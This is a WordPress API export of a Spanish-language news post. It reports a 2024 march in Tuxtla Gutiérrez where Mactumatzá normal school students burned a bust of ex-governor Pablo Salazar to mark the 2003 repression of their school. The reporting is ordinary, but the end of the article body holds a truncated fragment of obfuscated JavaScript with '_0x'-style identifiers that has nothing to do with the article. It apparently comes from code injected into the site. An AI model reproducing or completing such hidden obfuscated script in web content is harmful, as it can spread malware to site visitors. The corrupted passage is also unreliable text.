{"id":17088,"date":"2024-08-07T01:37:48","date_gmt":"2024-08-07T01:37:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17088"},"modified":"2024-08-07T01:37:49","modified_gmt":"2024-08-07T01:37:49","slug":"normalistas-de-la-mactumatza-recuerdan-represion-de-pablo-salazar","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17088","title":{"rendered":"Normalistas de la Mactumatz\u00e1, recuerdan represi\u00f3n de Pablo Salazar"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722994582914-1024x682.jpg\" alt=\"\" class=\"wp-image-17089\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722994582914-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722994582914-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722994582914-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722994582914-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722994582914.jpg 1081w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>6 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; La normal Mactumatz\u00e1 junto con diferentes escuelas Normales Rurales del pa\u00eds y organizaciones civiles y campesinas realizaron una marcha y quema de busto del ex gobernador Pablo Salazar Mendiguch\u00eda, para recordar la represi\u00f3n sufrida en el a\u00f1o 2003.<br>En la marcha se\u00f1alaron que, aquel acto represivo fueron atacadas m\u00e1s de 200 personas en una operaci\u00f3n donde se document\u00f3 abus\u00f3 de la fuerza p\u00fablica y lesiones a hombres, mujeres y ni\u00f1os que adicionalmente fueron llevados a prisi\u00f3n.<\/p>\n\n\n\n<p>La marcha parti\u00f3 de la Escuela Normal Rural Mactumactz\u00e1, en la colonia Plan de Ayala, en su caminar los participantes realizaron c\u00e1nticos y cortes viales.<\/p>\n\n\n\n<p>El busto de Pablo Salazar Mendiguch\u00eda es cargado por los alumnos, a su lado un ata\u00fad de cart\u00f3n con el nombre de Jos\u00e9 David recuerdan que el asalto las instalaciones de la escuela, deriv\u00f3 en un brutal enfrentamiento, choque violento donde \u201chubieron balazos, bombas molotov y pedradas, lo que dej\u00f3 un saldo de 50 heridos\u201d, y un fallecido.<\/p>\n\n\n\n<p>Terminaron en un mitin pol\u00edtico y la quema del busto del ex gobernador, la plancha del Palacio de Gobierno la frase y grito constante es \u201c6 de agosto no se olvida, ni perd\u00f3n ni olvido\u201d.<\/p>\n\n\n\n<p>Expusieron que la administraci\u00f3n del gobierno pablista orden\u00f3 el encierro de 177 estudiantes ind\u00edgenas y campesinos de la Normal, a quienes se les integr\u00f3 averiguaciones previas por los delitos de atentados contra la paz y secuestro. Aunque fuentes extraoficiales, hablan de 185 detenidos y decenas de desaparecidos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 6 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; La normal Mactumatz\u00e1 junto con diferentes escuelas Normales Rurales del pa\u00eds y organizaciones civiles y campesinas realizaron una marcha y quema de busto del ex gobernador Pablo Salazar Mendiguch\u00eda, para recordar la represi\u00f3n sufrida en el a\u00f1o 2003.En la marcha se\u00f1alaron que, aquel acto represivo fueron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17089,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17088","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17088"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17088\/revisions"}],"predecessor-version":[{"id":17090,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17088\/revisions\/17090"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17089"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}